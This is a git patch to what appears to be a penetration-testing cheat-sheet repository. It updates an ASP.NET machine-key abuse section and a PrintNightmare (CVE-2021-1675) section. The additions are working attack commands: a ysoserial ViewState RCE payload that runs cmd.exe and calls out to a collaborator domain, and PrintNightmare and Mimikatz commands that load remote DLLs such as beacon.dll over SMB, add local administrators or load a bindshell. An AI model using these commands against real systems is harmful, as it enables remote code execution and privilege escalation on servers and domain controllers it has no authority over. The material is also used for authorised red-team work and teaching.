From 2f8fc7bbb99001001a279d90b378fff43490e8f0 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 5 Jul 2021 21:57:14 +0200
Subject: [PATCH] PrintNightmare - Mimikatz

---
 API Key Leaks/README.md                       | 45 ++++++++++++++++---
 .../Active Directory Attack.md                | 20 ++++-----
 2 files changed, 50 insertions(+), 15 deletions(-)

diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md
index 0bf5e25..b4dd55b 100644
--- a/API Key Leaks/README.md	
+++ b/API Key Leaks/README.md	
@@ -17,7 +17,7 @@
     - [Twitter Bearer Token](#twitter-bearer-token)
     - [Gitlab Personal Access Token](#gitlab-personal-access-token)
     - [HockeyApp API Token](#hockeyapp-api-token)
-    - [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key)
+    - [IIS Machine Keys](#iis-machine-keys)
     - [Mapbox API Token](#Mapbox-API-Token)
 
 
@@ -99,11 +99,14 @@ curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hoc
 ```
 
 
-### Auth Bypass using pre-published Machine Key
+### IIS Machine Keys
 
-> By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
+> That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
 
-That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
+Requirements
+* machineKey **validationKey** and **decryptionKey**
+* __VIEWSTATEGENERATOR cookies
+* __VIEWSTATE cookies
 
 Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
 
@@ -111,8 +114,41 @@ Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/s
 <machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
 ```
 
+Common locations of **web.config** / **machine.config**
+* 32-bit
+    * C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
+    * C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
+* 64-bit
+    * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config
+    * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config
+* in registry when **AutoGenerate** is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)
+    * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4  
+    * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey
+
 Exploit with [Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
 
+#### Identify known machine key
+
+```powershell
+AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <real viewstate value> --purpose=viewstate --modifier=<modifier value> –macdecode
+```
+
+
+#### Generate ViewState for RCE
+
+**NOTE**: In Burp you should **URL Encode Key Characters** for your payload.
+
+```powershell
+ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "cmd.exe /c nslookup <your collab domain>"  --decryptionalg="AES" --generator=ABABABAB decryptionkey="<decryption key>"  --validationalg="SHA1" --validationkey="<validation key>"
+```
+
+
+#### Edit cookies with the machine key
+
+If you have the machineKey but the viewstate is disabled.
+
+ASP.net Forms Authentication Cookies : https://github.com/liquidsec/aspnetCryptTools
+
 ```powershell
 # decrypt cookie
 $ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
@@ -121,7 +157,6 @@ $ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX
 $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
 ```
 
-
 ### Mapbox API Token
 A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is `sk`, jackpot. If it's `pk` or `tk`, it's not worth your time.
 ```
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index f02ecaf..fec15ea 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -595,25 +595,25 @@ Requirements:
 # https://github.com/cube0x0/CVE-2021-1675 - require a modified Impacket: https://github.com/cube0x0/impacket
 python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
 python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'
-
-# LPE
+## LPE
 SharpPrintNightmare.exe C:\addCube.dll
-
-# RCE using existing context
+## RCE using existing context
 SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'
-
-# RCE using runas /netonly
+## RCE using runas /netonly
 SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll'  'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123
 
-# LPE only (PS1 + DLL) - https://github.com/calebstewart/CVE-2021-1675
+# https://github.com/calebstewart/CVE-2021-1675
+## LPE only (PS1 + DLL)
 Import-Module .\cve-2021-1675.ps1
 Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
 Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*" 
 Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
 
-# Original POC https://github.com/afwu/PrintNightmare
-.\PrintNightmare.exe dc_ip path_to_exp user_name password
-.\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123
+# Mimikatz - https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210705
+## LPE
+misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll
+## RCE
+misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50 
 ```
 
 **NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109) .